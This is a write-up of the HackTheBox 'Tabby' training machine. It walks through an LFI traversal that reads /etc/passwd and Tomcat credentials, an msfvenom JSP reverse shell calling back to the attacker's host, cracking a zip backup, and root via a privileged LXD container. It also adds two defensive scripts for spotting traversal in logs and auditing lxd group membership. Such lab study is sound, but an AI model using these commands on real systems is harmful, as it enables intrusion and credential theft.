HackTheBox Tabby writeup

Tabby is an easy Linux machine from HackTheBox and is part of the pool of machines recommended for OSCP certification preparation.

Enumeration

Start with an nmap scan:

nmap -sC -sV 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 06:30 EDT
Nmap scan report for 10.10.10.194
Host is up (0.021s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation of Tomcat

The service running on port 80 is vulnerable to LFI, which exposes /etc/passwd:

view-source:http://10.10.10.194/news.php?file=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash

It took a while to find the tomcat-users.xml file, as it's usually located at usr/share/tomcat9/conf/tomcat-users.xml. In this case, you can find the tomcat-users.xml file at view-source:http://10.10.10.194/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml.

Content of the file:

   <role rolename="admin-gui"/>
   <role rolename="manager-script"/>
   <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
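Both reads above went through the file parameter of news.php, so they leave traces in the web server's access log. The following is an added example, not part of the original writeup: it scans Apache combined-format log lines for traversal sequences in the query string, including percent-encoded ones. The log lines, the client addresses and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the writeup): detect traversal in query strings
# of Apache combined-format access logs.

# Constructed sample log lines; client addresses are documentation IPs.
sample_log() {
cat <<'EOF'
192.0.2.10 - - [10/Jul/2020:06:41:02 -0400] "GET /news.php?file=latest HTTP/1.1" 200 1841 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Jul/2020:06:42:15 -0400] "GET /news.php?file=../../../../../etc/passwd HTTP/1.1" 200 1934 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Jul/2020:06:43:40 -0400] "GET /news.php?file=%2e%2e%2F%2e%2e%2Fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 2325 "-" "curl/7.68.0"
192.0.2.10 - - [10/Jul/2020:06:44:01 -0400] "GET /assets/main.css?v=1.2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
EOF
}

# find_traversal [FILE...]: print "client status request-target" for each hit.
find_traversal() {
  awk '
    {
      target = $7                      # request target in combined log format
      q = index(target, "?")
      if (q == 0) next                 # no query string, nothing to inspect
      query = tolower(substr(target, q + 1))
      # Collapse nested percent-encoding (%252e -> %2e), then decode . and /
      while (query ~ /%25/) gsub(/%25/, "%", query)
      gsub(/%2e/, ".", query)
      gsub(/%2f/, "/", query)
      if (index(query, "../") > 0) print $1, $9, target
    }
  ' "$@"
}

# Demo on the constructed sample.
sample_log | find_traversal
```

A hit with status 200 means the include returned content, so those requests should be triaged first.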

Creating a reverse shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=53 -f war > shell.war

Any port number works. Here I'm following the "what if there were a firewall?" approach and avoiding something as sketchy as port 4444.

Uploading the reverse shell:

curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/shell'

Starting a listener on port 53:

nc -nlvp 53

Triggering the shell:

curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/shell/

Upgrading the shell to a full TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
CTRL+Z
stty raw -echo  
fg

Privilege escalation with LXC containers

From the /etc/passwd file we know that the user ash exists on the system. Enumerating privilege escalation paths with linpeas.sh reveals the file 16162020_backup.zip in /var/www/html/files/.

Download it to the Kali instance and crack it with fcrackzip:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip

The .zip file contains the credentials ash:admin@it.

Switch user with the su command:

ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

What’s LXD?

LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead.

Building a custom container:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo bash build-alpine

Uploading the new file to the machine and starting exploitation:

lxc image import ./alpine-v3.12-x86_64-20200710_0823.tar.gz --alias exploit

A list of images can be checked with the command:

lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| exploit | 35186ff8d0a4 | no     | alpine v3.12 (20200710_08:23) | x86_64       | CONTAINER | 3.05MB | Jul 10, 2020 at 3:28pm (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

The image has been imported. Now you can initialize a container from it as a privileged one and mount the host's root filesystem as a disk device:

lxc init exploit honk -c security.privileged=true
lxc config device add honk roguedevice disk source=/ path=/mnt/root recursive=true
lxc start honk
lxc exec honk /bin/sh

As a result, you get a root shell inside the container, with the host's root filesystem mounted at /mnt/root.
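The escalation depends only on ash being in the lxd group, so membership of that group should be audited like sudo access. The following is an added example, not part of the original writeup: it lists every account in a given group, counting primary-GID membership from the passwd database as well as the member list in the group database. The sample files are constructed from the id output above, and buildsvc is a hypothetical account added to show the primary-GID case.

```shell
#!/bin/sh
# Added example (not from the writeup): list accounts that belong to a group,
# counting supplementary membership (group file) and primary GID (passwd file).

# make_samples DIR: write constructed group/passwd files modelled on the
# id output above; buildsvc is a hypothetical account.
make_samples() {
  cat > "$1/group" <<'EOF'
adm:x:4:syslog,ash
lxd:x:116:ash
ash:x:1000:
EOF
  cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
ash:x:1000:1000:clive:/home/ash:/bin/bash
buildsvc:x:1001:116:hypothetical service account:/home/buildsvc:/bin/bash
tomcat:x:997:997::/opt/tomcat:/bin/false
EOF
}

# members_of GROUP GROUP_FILE PASSWD_FILE: print one member per line, sorted.
members_of() {
  awk -F: -v grp="$1" '
    FNR == NR {                         # first file: group database
      if ($1 == grp) {
        gid = $3
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") seen[m[i]] = 1
      }
      next
    }
    gid != "" && $4 == gid { seen[$1] = 1 }   # second file: primary GID match
    END { for (u in seen) print u }
  ' "$2" "$3" | sort
}

# Demo on the constructed sample files.
tmp=$(mktemp -d)
make_samples "$tmp"
echo "Accounts with lxd membership (treat as root-equivalent):"
members_of lxd "$tmp/group" "$tmp/passwd"
rm -rf "$tmp"
```

On a real host, pass /etc/group and /etc/passwd as the two files; an account that does not need LXD can be removed from the group with `gpasswd -d <user> lxd`.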